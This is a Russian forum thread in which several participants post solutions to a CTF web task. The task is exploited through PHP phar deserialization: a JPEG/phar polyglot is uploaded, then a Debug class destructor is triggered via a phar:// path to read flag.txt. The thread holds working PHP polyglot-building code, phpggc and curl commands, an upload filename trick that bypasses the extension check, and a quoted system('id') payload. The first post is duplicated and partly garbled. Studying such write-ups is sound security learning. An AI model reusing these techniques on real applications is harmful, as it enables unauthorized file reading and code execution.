↑

1. Можно лить картинки с расширением .jpg в папку upload//filename.jpg (можно было и просто в upload/)
   
2. view.php?f= выдаёт "Something wrong!" на несуществующий файл, а на любой существующий включает ссылку на upload/[/]basename()

Поскольку я тут тыкал таск crlf и перечитывал про это, возникла мысль про phar-архивы и unserialize, а найденный бэкап view.php (backup/view.bak) заботливо предоставил класс для читалки:
[COLOR="#bfbfbf"]Берём phpggc и создаём новую gadgetchain (здесь конечно никакой цепочки не нужно, просто для удобства генерации phar-архива, внедрённого в картинку):

phpggc -n task4 FR

и редактируем файлы:

.SpoilerTarget" type="button">Spoiler: gadgets.php

.SpoilerTarget" type="button">Spoiler: chain.php

[PHP]
[COLOR="#000000"]
Теперь легко создавать картинки для чтения файлов:

Код:

phpggc task4/FR1 "file:///var/www/flag.txt" -pj base_image.jpg -o image_with_payload.jpg

Заливаем

Код:

curl 'http://task.antichat.com:10004/upload.php' -H 'Cookie: PHPSESSID=' -F 'image=@image_with_payload.jpg;filename=somename.jpg'

и вызываем чтение phar-архива

Код:

curl 'http://task.antichat.com:10004/view.php?f=phar://upload//somename.jpg" -H 'Cookie: PHPSESSID='

Потребовалось поперебирать варианты и подсказка, что я на правильном пути, чтобы найти нужный файл /var/www/flag.txt

1_Kn0W_4b0Ut_Ph4R_M0r3
[COLOR="#bfbfbf"]

P.S.

Т.к. обработка filter_var($_FILES["image"]["name"],FILTER_SANITIZE_STRING) происходит непосредственно перед move_uploaded_file, можно заливать файлы с любым расширением, использовав, например, такое имя:

...;filename=somename.php/filename.jpg (можно было и просто в upload/)
[*]view.php?f= выдаёт "Something wrong!" на несуществующий файл, а на любой существующий включает ссылку на upload/[/]basename()[/LIST]Поскольку я тут тыкал таск crlf и перечитывал про это, возникла мысль про phar-архивы и unserialize, а найденный бэкап view.php (backup/view.bak) заботливо предоставил класс для читалки:
[COLOR="#bfbfbf"]Берём phpggc и создаём новую gadgetchain (здесь конечно никакой цепочки не нужно, просто для удобства генерации phar-архива, внедрённого в картинку):

phpggc -n task4 FR

и редактируем файлы:

.SpoilerTarget" type="button">Spoiler: gadgets.php

.SpoilerTarget" type="button">Spoiler: chain.php

[PHP]
[COLOR="#000000"]
Теперь легко создавать картинки для чтения файлов:

Код:

phpggc task4/FR1 "file:///var/www/flag.txt" -pj base_image.jpg -o image_with_payload.jpg

Заливаем

Код:

curl 'http://task.antichat.com:10004/upload.php' -H 'Cookie: PHPSESSID=' -F 'image=@image_with_payload.jpg;filename=somename.jpg'

и вызываем чтение phar-архива

Код:

curl 'http://task.antichat.com:10004/view.php?f=phar://upload//somename.jpg" -H 'Cookie: PHPSESSID='

Потребовалось поперебирать варианты и подсказка, что я на правильном пути, чтобы найти нужный файл /var/www/flag.txt

1_Kn0W_4b0Ut_Ph4R_M0r3


P.S.

Т.к. обработка filter_var($_FILES["image"]["name"],FILTER_SANITIZE_STRING) происходит непосредственно перед move_uploaded_file, можно заливать файлы с любым расширением, использовав, например, такое имя:

[FONT="Courier New"]...;filename=somename.phpimg = $img;
}
public function getmime(){
return mime_content_type($this->img);
}
public function setHook($hook){
$this->hook = $hook;
}
public function deleteImg(){
unlink($this->img);
echo "Изображение {$this->img} удалено";
}
public function fsize() {
return (round(filesize($this->img) / 1024))." KB";
}
public function __destruct() {
if (isset($this->hook)) echo file_get_contents($this->hook);
}
public function getName(){
return basename($this->img,'.'.explode('.',$this->img)[1]);
}
public function getImgStat(){
foreach(stat($this->img) as $name => $val) {
if(is_int($name))
continue;
echo "[$name] ======> [$val]
";
}
}
public function curDir(){
return getcwd();
}
}
$jpeg_header_size =
"\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\ x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
"\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\ x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
"\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\ x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0 c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\ x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x1 5".
"\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\ xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x0 5\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\ x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x1 4".
"\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\ x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x1 4\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\ x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x0 1".
"\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc 4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x0 3".
"\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\ xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\ x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x1 1".
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x0 1\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2 0".
"\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\ xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\ x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x0 1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3 f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\ x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x0 0".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x1 0\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xd a".
"\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\ x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\ x00\x01\x3f\x10\x1f\xff\xd9";

$phar = new Phar("flag.jpg");
$phar->startBuffering();
$phar->addFromString("test.txt","test");
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>");
$o = new Debug(".");
$o->setHook("/var/www/flag.txt");
$phar->setMetadata($o);
$phar->stopBuffering();
[/CODE]
5. Заливаем картинку на сервер и эксплуатируем уязвимость по ссылке: http://task.antichat.com:10004/view....phar://upload/{SESSION_ID}/flag.jpg/test.txt

6. Смотрим сорцы страницы и получаем флаг 1_Kn0W_4b0Ut_Ph4R_M0r3

↑
Привет
Флаг:
1_Kn0W_4b0Ut_Ph4R_M0r3
Был создан файл-полиглот phar+jpg с использованием:
https://github.com/kunte0/phar-jpg-polyglot
Payload:
Далее был загружен файл и вызван:
Догадался еще в пятницу, но почему-то через pharggc не получалось
P.S. Спасибо за таск!

↑
Привет!
task4: 1_Kn0W_4b0Ut_Ph4R_M0r3
Последовательность:
1. /backup/ содержит view.bak, читаем сырцы
2. В сырцах есть file_exists и объект с __desctruct
3. Крафтим jpg файл, который выглядит, как jpeg, но пахнет грушей. Пут
4. Загружаем файл, открываем view.php?f=phar://...
5. Видим, что умеем читать сырцы.
6. Читаем .htaccess
8. Читаем flag.txt.
Основной код:
$hdr=file_get_contents("/path/to/valid/jpeg");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->addFromString("test.txt","test");
$phar->setStub($hdr." __HALT_COMPILER(); ?>");
$o = new Debug("123");
$o->setHook("/var/www/flag.txt");
$phar->setMetadata($o);
$phar->stopBuffering();

↑
Привет!
1_Kn0W_4b0Ut_Ph4R_M0r3
Находим бэкапы, читаем файл view.bak.
После длительных и безуспешных попыток повлиять на сессию, понимаем, что как-то это все сильно пахнет десериализацией. Вспоминаем статьи про phar, которые вышли в конце прошлого года. Дальше я начисто забыла, что file_exists тоже тригерится, но по статьям это вспомнила. Находим код, который позволяет построить phar архив с нужной нагрузкой, но замаскироваться под jpeg. Код из статьи rips хороший, но не дает сделать картинку. Погуглила, нашла проект полиглот
https://github.com/kunte0/phar-jpg-p...g_polyglot.php
Создаем phar-картинку, содержащую объект класса Debug. В качестве поля $hook ставим адрес файла, который хотим прочитать. Читаем исходники, понимаем, что там нет флага
смотрим .htaccess, там намек на флаг, но flag.txt в корне не находится. Зато находится на уровень выше.

↑
Хай.
скрин пейлоада
https://www.dropbox.com/s/lt9dz7hv5ibu99z/Screenshot 2019-02-19 02.21.43.png?dl=0
private $hook = '/var/www/flag.txt';
view.php?f=phar:////var/www/html/upload/cc/me.jpg
1_Kn0W_4b0Ut_Ph4R_M0r3

↑
флаг 1_Kn0W_4b0Ut_Ph4R_M0r3
Решение:
Находим /backup/view.bak
видим что пользовательские данные в параметре f никак не проверяются.
_destruсt вроде как можно использовать с unserialize (у нас есть класс и функция ) но не понятно куда подсовывать сериализованные данные. Вспоминаем про хайповую тему с phar. читам подробно
https://blog.ripstech.com/2018/new-p...ion-technique/
и понимаем что у нас все что нужно есть. Остается сделать нужную картинку.
Записываем в phar архив метаданные
"O:5:"Debug":2:{s:4:"hook";s:17:"/var/www/flag.txt";s:4:"file";s:17:"/var/www/flag.txt";}"
где искать флаг не сразу понял, после прочтения .htaccess стало понятно (спасибо dooble)
сам не стал разбираться как сделать картинку и phar архив с нуля, на работе с временем напряг...
Сделал через готовое решение
https://github.com/kunte0/phar-jpg-polyglot

↑
1.
http://task.antichat.com:10004/backup/view.bak
Находим исходник view.php
2. Смотрим на код.
Ищем в гугле php destruct vulnerability
находим статью
https://blog.ripstech.com/2018/new-p...ion-technique/
Понимаем что враппер phar:// позволяет выполнить php код, но в нашем случае мы можем только читать файлы
public function __destruct() {
if (isset($this->hook)) echo file_get_contents($this->hook);
}
3. Далее нам нужно создать phar файл, но так как загружать можно только jpg так как происходит проверка mime типов нужно сделать так чтобы phar обрабатывался как картинка.
В структуре phar файла есть "заголовок"
$phar->setStub('');
в который мы можем встатвить картинку.
4. Добрые люди уже автоматизировали процесс создания phar+jpg картинки
https://github.com/kunte0/phar-jpg-p...g_polyglot.php
Качаем скрипт phar_jpg_polyglot.php
и меняем там:
class PHPObjectInjection {}
$object = new PHPObjectInjection;
$object->inject = 'system("id");';
$object->out = 'Hallo World';
// pop exploit class
на наш:
// pop exploit class
class Debug {}
$object = new Debug;
$object->hook = '../flag.txt';
да... сначала мы прочитали файл .htaccess и нашли там хинт
and finally, yes now 1_Kn0W_4b0Ut_Ph4R_M0r3!!!

↑
С твоей подсказкой про воздействие на классы без unserialize() выхожу на трюк с phar://, изучаю вот это всё, пытаюсь сообразить, это всё под данный таск подходит или нет? Ответ нашел в этом сообщении:
https://rdot.org/forum/showpost.php?p=43352&postcount=4
Все сразу стало ясно. Ещё пару статей почитал, вкурил как оно должно работать.
За основу был взят код генерации полезного файла:
https://rdot.org/forum/showpost.php?...0&postcount=66
Это чтобы и проверку на картинки обойти, и правильно сформировать рабочий архив.
У меня на локалхосте всё читалось как надо, но я уже успел обратить внимание, что file_get_contents находясь в __destruct назначает себе путь / и прочесть рядом лежащие файлы не может, для этого требуется полный путь.
Я уже понимаю, как этот самый путь надо было доставать:
Воздействовать на $img; и выполнить функцию curDir(), она там явно не просто так.
Но мне не удалось найти инфу, как это реализовать, зато как в переменные класса вклиниваться расписано достаточно.
Поэтому я нашел альтернативный вариант, зашел в task#2, выполнил в нем phpinfo(); и пути совпали. Кстати пути и файлы на существование чекать можно прямо через переменную f, вполне удобно, сначала чекнул файл, есть? А затем прочитать.
Ну дальше всё просто, формируем архив:
Читаем все файлы, и понимаем, что флага нигде нет, я уж подумал, сейчас зафейлюсь на этом этапе, и запомню этот таск надолго.
Хотел прочитать сессии, всякие вспомогательные файлы, увидел, что .htaccess есть, прочитал его, не сразу вкурил, почему в корне он отсутствует, попробовал в других местах поискать, в /tmp/ /upload/ на директорию выше, и нашел.
Флаг: /var/www/flag.txt содержимое: 1_Kn0W_4b0Ut_Ph4R_M0r3

↑
Флаг - "1_Kn0W_4b0Ut_Ph4R_M0r3"
Таск офигенный ) Не знал что пыха так умеет. Но честно, бэкап искал дольше чем нашёл статьи по уязвимости)
Решение:
Находим бэкап файл в /backup/
Видим что в view.php есть вызов функции file_exists и класс Debug у которого определены методы
__construct и __destruct. Видим что в __destruct есть интересная нам функция file_get_contents. Гуглим file_exists + unserialization (хинт) и находим статьи про phar фильтр. Собираем phar файл и маскируем под jpg (polyglot - one love). Загружаем полученный payload и на странице и переходим на /view.php?f=phar://upload/SESSION/payload.jpg. Читаем флаг, всё !

↑
в общем, класс, после него file_exists очевидный вариант напрашивается с оберткой phar:// + десериалиция класса Debug
но загружаются только файлы .jpg причем с проверкой по mime-type
я взял за основну софт кореша (
https://github.com/kunte0/phar-jpg-polyglot
) немного подправил
загрузил poc
1_Kn0W_4b0Ut_Ph4R_M0r3

↑
Спасибо за таск!
flag.txt :
1_Kn0W_4b0Ut_Ph4R_M0r3
Решение:
Сначала набрутил исходник
http://task.antichat.com:10004/backup/view.bak
.
Класс Debug с магическим методом __destruct намекает на небезопасную десериализацию))
Дальше немного подвис, пока не появились новые хинты...
Выяснил, что при использовании враппера phar объекты десериализуются при вызове любых методов работы с
файлами (file_exists в нашем случае).
Пэйлоад сформировал и внедрил в jpg-файл с помощью phpggc (цепочку сделал кастомную на основе класса Debug).
Почитал файлы на системе, в htaccess deny на flag.txt, значит его и надо искать. Он оказался директорией выше)

↑
Не мог найти исходники, брутил файлы.Но оказывается нужно было посматреть папки).Нагуглил вот это
https://blog.ripstech.com/2018/new-p...ion-technique/
и использовал вот это для решения
https://github.com/kunte0/phar-jpg-polyglot
. Флаг получил методом тыка) Флаг:1_Kn0W_4b0Ut_Ph4R_M0r3